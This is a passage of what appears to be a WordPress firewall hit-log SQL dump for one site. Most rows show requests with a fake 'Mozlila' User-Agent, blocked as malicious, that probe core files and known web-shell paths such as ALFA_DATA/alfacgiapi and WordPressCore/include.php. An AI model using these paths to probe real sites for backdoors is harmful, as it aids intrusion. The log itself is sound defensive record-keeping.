Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RtcHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133283,1699888659.383291,1699888659.374700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/upload/','http://eckankar-colorado.org/upload/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133229,1699888684.923955,1699888684.914800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ubh/','http://eckankar-colorado.org/wp-content/plugins/ubh/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91Ymgv\",\"category\":\"brute-force\",\"ssl\":1}'),(133230,1699888684.591634,1699888684.582900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/random/','http://eckankar-colorado.org/wp-content/plugins/random/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yYW5kb20v\",\"category\":\"brute-force\",\"ssl\":1}'),(133260,1699888673.280226,1699888673.271600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/Exception.php','http://eckankar-colorado.org/wp-includes/PHPMailer/Exception.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9FeGNlcHRpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133258,1699888673.964854,1699888673.956200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/SMTP.php','http://eckankar-colorado.org/wp-includes/PHPMailer/SMTP.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9TTVRQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133194,1699888478.288692,1699888478.279800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/bookmark-template.php','http://eckankar-colorado.org/wp-includes/bookmark-template.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jvb2ttYXJrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133257,1699888674.620872,1699888674.612200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-index.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-index.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLWluZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133253,1699888675.962517,1699888675.953800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXN0eWxlc2hlZXQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133255,1699888675.299335,1699888675.283700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-registry.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXJlZ2lzdHJ5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133254,1699888675.629587,1699888675.620900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-renderer.php','http://eckankar-colorado.org/wp-includes/sitemaps/class-wp-sitemaps-renderer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL2NsYXNzLXdwLXNpdGVtYXBzLXJlbmRlcmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133250,1699888677.296564,1699888677.287800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','http://eckankar-colorado.org/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzL3Byb3ZpZGVycy9jbGFzcy13cC1zaXRlbWFwcy10YXhvbm9taWVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133193,1699888478.620047,1699888478.611300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/bookmark.php','http://eckankar-colorado.org/wp-includes/bookmark.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jvb2ttYXJrLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133243,1699888679.979334,1699888679.970800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/ubh/','http://eckankar-colorado.org/ubh/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ViaC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133242,1699888680.325522,1699888680.316800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/ALFA_DATA/alfacgiapi/','http://eckankar-colorado.org/wp-content/ALFA_DATA/alfacgiapi/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRBL2FsZmFjZ2lhcGkv\",\"category\":\"brute-force\",\"ssl\":1}'),(133192,1699888478.958639,1699888478.949900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/cache-compat.php','http://eckankar-colorado.org/wp-includes/cache-compat.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NhY2hlLWNvbXBhdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133181,1699888482.922380,1699888482.913600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-phpass.php','http://eckankar-colorado.org/wp-includes/class-phpass.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXBocGFzcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133526,1699888567.687616,1699888567.679000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-message.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-message.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItbWVzc2FnZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133566,1699888552.385520,1699888552.376900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/shortcodes.php','http://eckankar-colorado.org/wp-includes/shortcodes.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Nob3J0Y29kZXMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134254,0.000000,1699995498.454845,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(134255,1699995516.924640,1699995516.915800,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/inputs.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2lucHV0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134258,1699998198.360919,1699998198.339000,0x00000000000000000000FFFF5B5CFC8E,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133497,1699888579.722333,1699888579.713600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-setting.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-background-image-setting.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtYmFja2dyb3VuZC1pbWFnZS1zZXR0aW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133523,1699888568.707416,1699888568.698700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-value.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-value.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItdmFsdWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133328,1699888643.724538,1699888643.715600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/plugin-install.php','http://eckankar-colorado.org/wp-admin/includes/plugin-install.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3BsdWdpbi1pbnN0YWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133327,1699888644.057619,1699888644.048800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/plugin.php','http://eckankar-colorado.org/wp-admin/includes/plugin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL3BsdWdpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133326,1699888644.395026,1699888644.379600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/post.php','http://eckankar-colorado.org/wp-admin/includes/post.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 